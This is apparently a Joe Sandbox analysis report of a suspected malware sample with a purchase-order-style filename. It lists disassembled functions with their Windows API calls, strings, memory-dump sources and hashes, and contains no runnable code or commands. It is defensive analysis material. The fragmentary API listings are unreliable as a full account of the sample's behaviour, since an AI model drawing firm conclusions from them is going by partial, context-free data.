Instruction ID: 75af9ec50760755e836abce323f7a54ddbaf44f5e0835d8c920f5867198b60a7
Opcode Fuzzy Hash: 412483d3d58d27abbe8d0b37aa77e3ba7b73ad12b5cbd7d043ce77851ab0f321
Instruction Fuzzy Hash: CD21D271A00108BEDB08AB65D886EFF7778DF49354F10422EF511A21E1DB7C590A97A8

Function 004051AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040522F
_wcscpy.LIBCMT ref: 00405283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00473CB0

Strings

Line: , xrefs: 00473CD9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction ID: af1427f6d41ff21884d985d4e629e724e95b45f0675a28509f4e8d353c660326
Opcode Fuzzy Hash: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction Fuzzy Hash: 2D319E71508340AED361EB61EC46FEB77D8AF45304F00452FF585A61E2DB78A5488F9E

Function 004543E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00454457
InternetCloseHandle.WININET(00000000), ref: 0045449E

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 00454450

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction ID: 7aa06a6f42cffd20407d20dfa3cc54c699f161c4d28ccd99cc58e54c7684c86d
Opcode Fuzzy Hash: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction Fuzzy Hash: 9C21D0B1540208BFE7119F94CC80EBF77ECEB8975DF10842FF9059A281EA688D499779

Function 004690E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0046915C
LoadLibraryW.KERNEL32(?), ref: 00469163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00469178
DestroyWindow.USER32(?), ref: 00469180

Strings

SysAnimate32, xrefs: 00469137

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction ID: 16967437a8ff6b7649d04cfe7d5b64226969d6153742429de35e53786cdd0d82
Opcode Fuzzy Hash: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction Fuzzy Hash: 7C218371600206BBFF104E649C44EFB37ADEF56364F20461AF95492290E7B5DC42A769

Function 00449568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00449588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004495B9
GetStdHandle.KERNEL32(0000000C), ref: 004495CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00449605

Strings

nul, xrefs: 00449600

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction ID: 66b3d4fb4e9643f34041b919343489f51d7d56158e1018fa912c4bcc0f6ac78b
Opcode Fuzzy Hash: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction Fuzzy Hash: 48216B71600205ABFB219F25DC05A9FBBB8AF45724F204A2EF8A1D72D0D774DD41EB28

Function 00449634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00449653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00449683
GetStdHandle.KERNEL32(000000F6), ref: 00449694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004496CE

Strings

nul, xrefs: 004496C9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction ID: 90b4d87eb029effa5109f35d439d52d9dc698f60e9680a3d94063f085d7b045b
Opcode Fuzzy Hash: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction Fuzzy Hash: 7721A1719002059BEB209F698C44E9FB7E8AF95734F200A1AF8A1D33D0D7749C41DB18

Function 0043C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
Part of subcall function 0043C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
Part of subcall function 0043C82D: GetCurrentThreadId.KERNEL32 ref: 0043C864
Part of subcall function 0043C82D: AttachThreadInput.USER32(00000000), ref: 0043C86B

GetFocus.USER32 ref: 0043CA05

Part of subcall function 0043C876: GetParent.USER32(?), ref: 0043C884

GetClassNameW.USER32(?,?,00000100), ref: 0043CA4E
EnumChildWindows.USER32(?,0043CAC4), ref: 0043CA76
__swprintf.LIBCMT ref: 0043CA90

Strings

%s%d, xrefs: 0043CA8A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction ID: 829f495f47ef218ad7d12fc0482335a0f9b2c0f30f702a8be16dcec9d61f0c8a
Opcode Fuzzy Hash: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction Fuzzy Hash: 8A1172716002096BCF15BF619CC5FAA3778AF49718F00907BFA09BA182DB789645DB78

Function 0046E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E33D
_memset.LIBCMT ref: 0046E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3D00,004C3D44), ref: 0046E37B
CloseHandle.KERNEL32 ref: 0046E38D

Strings

D=L, xrefs: 0046E346

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=L
API String ID: 3277943733-2639313163
Opcode ID: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction ID: 1dc04ddbbd56b6e1bfcd3b76fe9272b6450bf468c53a2e9cb482092a9c0dbf5b
Opcode Fuzzy Hash: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction Fuzzy Hash: 20F0BEF0601310BAE2502F61BC05FBB3EACDB04756F008436BE0AD61A2D3799E0087AC

Function 00AF3FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AF3F73,00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002), ref: 00AF3FE2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AF3FF5
FreeLibrary.KERNEL32(00000000,?,?,?,00AF3F73,00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000), ref: 00AF4018

Strings

mscoree.dll, xrefs: 00AF3FDB
CorExitProcess, xrefs: 00AF3FED

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9decd1c7ade07b9eb1cd3cd367ea2500da613c503eca37fb4201eae2b76f1c95
Instruction ID: 98b6cdf224ed50524682a1b6924ffe81edaa0aae9f0a168e811ec70cf4f6290c
Opcode Fuzzy Hash: 9decd1c7ade07b9eb1cd3cd367ea2500da613c503eca37fb4201eae2b76f1c95
Instruction Fuzzy Hash: DBF04F70A4021CBBCB119FD4DC09BFEBFB9EB48751F0001A4F90AA21A0DFB49A45CA95

Function 00461945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004619F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00461A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00461B49
CloseHandle.KERNEL32(?), ref: 00461BBF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction ID: 2bdb186c9e029468b938e76092bf29530639fde0365ee340ce212a0d3725281c
Opcode Fuzzy Hash: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction Fuzzy Hash: 94816570600204ABDF10DF65C886BAEBBE5AF04714F18845EF905AF3D2E7B8A941CB95

Function 0046E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0046E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0046E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0046E248
GetWindowLongW.USER32(?,000000EC), ref: 0046E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0046E281

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 013adbfa369c8983b8cd62041ff00c2aa11dd50f530f7c8b5fe76d3ced3d0aa1
Instruction ID: bdb366902d71711e492ed88324e390aca6fd6c32f1e052b1125fce0f7f40200c
Opcode Fuzzy Hash: 013adbfa369c8983b8cd62041ff00c2aa11dd50f530f7c8b5fe76d3ced3d0aa1
Instruction Fuzzy Hash: 07619438A00204AFDB20CF56C854FEB77FAAB4A300F14405BF955973A1D779A951DB1A

Function 00460688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004606EE
GetProcAddress.KERNEL32(00000000,?), ref: 0046077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0046079B
GetProcAddress.KERNEL32(00000000,?), ref: 004607E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 004607FB

Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0044A574,?,?,00000000,00000008), ref: 0041E675
Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0044A574,?,?,00000000,00000008), ref: 0041E699

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction ID: 87febcb3e1d6037208c0937028248e6385403b15d7085c17ee78e3048b04f42a
Opcode Fuzzy Hash: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction Fuzzy Hash: F1516E75A00205DFCB04EFA9C485DAEB7B5BF18314B04806AE905AB391EB38ED45CF89

Function 00462E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00462F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00462F75
RegCloseKey.ADVAPI32(?,?), ref: 00462FA1
RegCloseKey.ADVAPI32(00000000), ref: 00462FAE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 4d18af4e82d6d0b7a8eee85a3ae716d0fa40a678c36dbf43d598d0e030d7a270
Instruction ID: f2e41662885f165f18e384d2a40cd3da89a2193350d58dfc2c6ca3ce7a760dd9
Opcode Fuzzy Hash: 4d18af4e82d6d0b7a8eee85a3ae716d0fa40a678c36dbf43d598d0e030d7a270
Instruction Fuzzy Hash: 48518B71608204AFD704EF64C981E6BB7F8FF88308F00492EF59597291EB78E905DB5A

Function 0046CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
Instruction ID: 09529bc7e3110235e9e6e45ecf7d8fa4ad648c899c66dbd7154b48755ec01ae1
Opcode Fuzzy Hash: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
Instruction Fuzzy Hash: CA41B339E01104ABD714DF68CC84FBABB74EB09310F140236E999A72E1E739AD11969A

Function 00451206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004512B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004512DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0045131C

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00451341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00451349

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction ID: 710539193e7f1d8fb549b37adceebc83b926d8c979f1569505f486b0f8da61be
Opcode Fuzzy Hash: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction Fuzzy Hash: 0F414C35A00105DFDB01EF65C981AAEBBF5FF08314B1480AAE946AB3A2DB35ED01DF54

Function 0041B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0041B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
GetAsyncKeyState.USER32(00000001), ref: 0041B691
GetAsyncKeyState.USER32(00000002), ref: 0041B69F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
